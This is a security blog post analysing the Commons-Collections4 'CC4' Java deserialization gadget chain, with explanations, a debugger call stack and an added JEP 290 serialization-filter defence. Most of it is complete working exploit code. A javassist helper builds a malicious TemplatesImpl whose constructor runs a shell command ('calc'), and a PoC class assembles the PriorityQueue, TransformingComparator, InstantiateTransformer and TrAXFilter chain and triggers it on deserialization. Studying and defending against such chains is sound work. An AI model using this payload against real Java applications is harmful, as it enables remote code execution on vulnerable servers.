Preface
Like CC3, CC4 is a variant of CC2: the entry point is still PriorityQueue + TransformingComparator, but the trigger is CC3's InstantiateTransformer (constructing a TrAXFilter around a malicious TemplatesImpl) instead of InvokerTransformer.
Requires Commons-Collections4 4.0. From 4.1 onwards InstantiateTransformer (like InvokerTransformer) no longer implements Serializable, so the chain does not deserialize on later versions.
Code reproduction
Helper classes
Generating the malicious TemplatesImpl:
TemplatesGeneratorPacked/GetAbstractTranslet.java
package TemplatesGeneratorPacked;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;
public class GetAbstractTranslet {
    // Builds the bytecode of a class "e" extending AbstractTranslet (the superclass that
    // TemplatesImpl.defineTransletClasses() requires). TemplatesImpl.getTransletInstance()
    // calls newInstance() on it, so the no-arg constructor body is where the command runs.
    public static byte[] generate() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("e");
        CtClass zuper = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(zuper);
        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        clazz.addConstructor(constructor);
        return clazz.toBytecode();
    }
}
TemplatesGeneratorPacked/GetTemplatesImpl.java
package TemplatesGeneratorPacked;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import ReflectPacked.ValueGetterSetter;
public class GetTemplatesImpl {
    public static TemplatesImpl getTemplatesImpl() throws Exception{
        byte[][] bytes = new byte[][]{GetAbstractTranslet.generate()};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        // _bytecodes: the translet class bytes loaded by defineTransletClasses().
        ValueGetterSetter.setValue(templates, "_bytecodes", bytes);
        // _name must be non-null, otherwise getTransletInstance() returns early without loading anything.
        ValueGetterSetter.setValue(templates, "_name", "a");
        // _tfactory is transient and re-created in TemplatesImpl.readObject(); it is set here so the
        // object also works when newTransformer() is called directly in the generator's own JVM.
        ValueGetterSetter.setValue(templates, "_tfactory", new TransformerFactoryImpl());
        return templates;
    }
}
Reflective get/set:
ReflectPacked/ValueGetterSetter.java
package ReflectPacked;
import java.lang.reflect.Field;
public class ValueGetterSetter {
    // getDeclaredField() only looks at the runtime class itself, not its superclasses;
    // that is sufficient for every field touched in this chain.
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static Object getValue(Object obj, String name) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        return field.get(obj);
    }
}
Deserialization:
UnserializePacked/Unserialize.java
package UnserializePacked;
import java.io.*;
public class Unserialize {
    // Round-trips obj through a temp file: writeObject() produces the payload bytes,
    // readObject() plays the victim and is what triggers PriorityQueue.readObject().
    public static void unserialize(Object obj) throws Exception{
        File f = File.createTempFile("temp", "out");
        f.deleteOnExit();
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f))) {
            oos.writeObject(obj);
        }
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f))) {
            Object o = ois.readObject();
            System.out.println(o);
        }
    }
}
PoC
package cc.cc4;
import ReflectPacked.ValueGetterSetter;
import TemplatesGeneratorPacked.GetTemplatesImpl;
import UnserializePacked.Unserialize;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.util.PriorityQueue;
public class PoC {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();
        // Harmless placeholders: while the queue is being built, compare() runs
        // ConstantTransformer -> String.class, then InstantiateTransformer -> new String("a"),
        // so the payload does not fire in the generator's own JVM.
        ConstantTransformer constantTransformer = new ConstantTransformer(String.class);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(
                new Class[]{String.class},
                new Object[]{"a"}
        );
        ChainedTransformer chainedTransformer = new ChainedTransformer(
                constantTransformer,
                instantiateTransformer);
        TransformingComparator comparator = new TransformingComparator(chainedTransformer);
        // Two elements are required: PriorityQueue.readObject() -> heapify() only calls the
        // comparator when size >= 2. The second add() already calls compare() once, harmlessly.
        PriorityQueue queue = new PriorityQueue(2, comparator);
        queue.add(1);
        queue.add(1);
        // Swap in the real payload by reflection after the queue is built: ConstantTransformer
        // now yields TrAXFilter.class and InstantiateTransformer calls new TrAXFilter(templates),
        // whose constructor invokes templates.newTransformer().
        ValueGetterSetter.setValue(constantTransformer, "iConstant", TrAXFilter.class);
        ValueGetterSetter.setValue(instantiateTransformer, "iParamTypes", new Class[]{Templates.class});
        ValueGetterSetter.setValue(instantiateTransformer, "iArgs", new Object[]{templates});
        Unserialize.unserialize(queue);
    }
}
Code audit | Principle analysis
The idea is CC2 combined with CC3, so only the flow is summarized here; see:
『Java Security』Deserialization - CC2 deserialization vulnerability POP chain analysis_ysoserial CommonsCollections2 PoC analysis
『Java Security』Deserialization - CC3 deserialization vulnerability POP chain analysis_ysoserial CommonsCollections3 PoC analysis
Listed from the sink back to the entry point:
1. TrAXFilter's constructor, when handed a TemplatesImpl, calls templates.newTransformer(), which loads the translet bytecode from _bytecodes and instantiates it (the CC3 sink).
2. InstantiateTransformer.transform(input) treats input as a Class and invokes its constructor with iParamTypes/iArgs, here new TrAXFilter(templates). The preceding ConstantTransformer supplies TrAXFilter.class regardless of what the queue element is.
3. TransformingComparator.compare(a, b) first runs this.transformer.transform() on both operands, then compares the results with the decorated comparator.
4. PriorityQueue.readObject() restores the comparator and the elements, then calls heapify(), which calls siftDown() -> comparator.compare(). heapify() only compares when the queue holds at least two elements, which is why the PoC adds two.
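The chain described in the preface and in the four steps above also shows where to cut it: the comparator is only dangerous if ObjectInputStream is willing to instantiate it. The following Java program is an added example (not part of the original post, of ysoserial, or of Commons Collections) that serializes the same PriorityQueue / TransformingComparator / ChainedTransformer structure the PoC builds before the reflective swap (with the harmless String placeholder and no TemplatesImpl) and then deserializes it through a JEP 290 serialization filter that allow-lists only the classes the application expects. It assumes Java 9 or later (java.io.ObjectInputFilter) and commons-collections4 4.0 on the classpath; the class name FilteredUnserialize and the allow-list pattern are my own choices.

```java
package UnserializePacked;

import java.io.*;
import java.util.PriorityQueue;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

public class FilteredUnserialize {

    // Allow-list filter (JEP 290 pattern syntax): only PriorityQueue and java.lang.* boxed
    // values are accepted; "!*" rejects every other class, including the whole
    // org.apache.commons.collections4 package, before ObjectInputStream instantiates it.
    // Assumption: the application only ever expects a queue of boxed numbers here.
    private static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "java.util.PriorityQueue;java.lang.*;!*");

    // Serialize any object to bytes (for the demo; in practice the bytes arrive over the network).
    public static byte[] serialize(Object obj) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(obj);
        }
        return bos.toByteArray();
    }

    // Deserialize with the filter installed on this stream only; a rejected class descriptor
    // surfaces as InvalidClassException ("filter status: REJECTED").
    public static Object unserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    // The CC4 gadget shape with the harmless placeholder (ConstantTransformer -> String.class,
    // InstantiateTransformer -> new String("a")), i.e. the PoC's queue before the reflective swap.
    @SuppressWarnings({"unchecked", "rawtypes"})
    public static PriorityQueue<Object> gadgetShapedQueue() {
        ChainedTransformer chain = new ChainedTransformer(
                new ConstantTransformer(String.class),
                new InstantiateTransformer(new Class[]{String.class}, new Object[]{"a"}));
        PriorityQueue<Object> queue = new PriorityQueue<>(2, new TransformingComparator(chain));
        queue.add(1);
        queue.add(1);
        return queue;
    }

    // Returns true if the filter rejected the gadget-shaped stream, false if it was accepted.
    public static boolean gadgetIsRejected() throws Exception {
        try {
            unserializeFiltered(serialize(gadgetShapedQueue()));
            return false;
        } catch (InvalidClassException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        // Benign queue: natural ordering, so no comparator class appears in the stream -> accepted.
        PriorityQueue<Integer> benign = new PriorityQueue<>();
        benign.add(2);
        benign.add(1);
        System.out.println("benign queue: " + unserializeFiltered(serialize(benign)));

        // Gadget-shaped queue: TransformingComparator is rejected while its class descriptor is
        // read, before the comparator field is assigned and long before heapify() calls compare().
        System.out.println("gadget-shaped queue rejected: " + gadgetIsRejected());
    }
}
```

The filter is consulted for every class descriptor as it is read, so the rejection happens at step 4 of the chain before the comparator object even exists. On Java 8u121 and later the same pattern works through sun.misc.ObjectInputFilter, or process-wide via -Djdk.serialFilter=...; the part that matters is the trailing "!*", a default-deny that also covers the next gadget chain instead of just this one.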
POP chain (debugger call stack, sink at the top, entry point at the bottom)
newTransformer:439, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:57, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:526, Constructor (java.lang.reflect)
transform:116, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:32, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:112, ChainedTransformer (org.apache.commons.collections4.functors)
compare:81, TransformingComparator (org.apache.commons.collections4.comparators)
siftDownUsingComparator:699, PriorityQueue (java.util)
siftDown:667, PriorityQueue (java.util)
heapify:713, PriorityQueue (java.util)
readObject:773, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:57, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:606, Method (java.lang.reflect)
invokeReadObject:1017, ObjectStreamClass (java.io)
readSerialData:1893, ObjectInputStream (java.io)
readOrdinaryObject:1798, ObjectInputStream (java.io)
readObject0:1350, ObjectInputStream (java.io)
readObject:370, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:40, PoC (cc.cc4)
End
Feel free to follow my CSDN blog: @Ho1aAs
Copyright: Ho1aAs
Article link: https://blog.csdn.net/Xxy605/article/details/123448990
Copyright notice: this article is original; reproduction must credit the source and include this notice.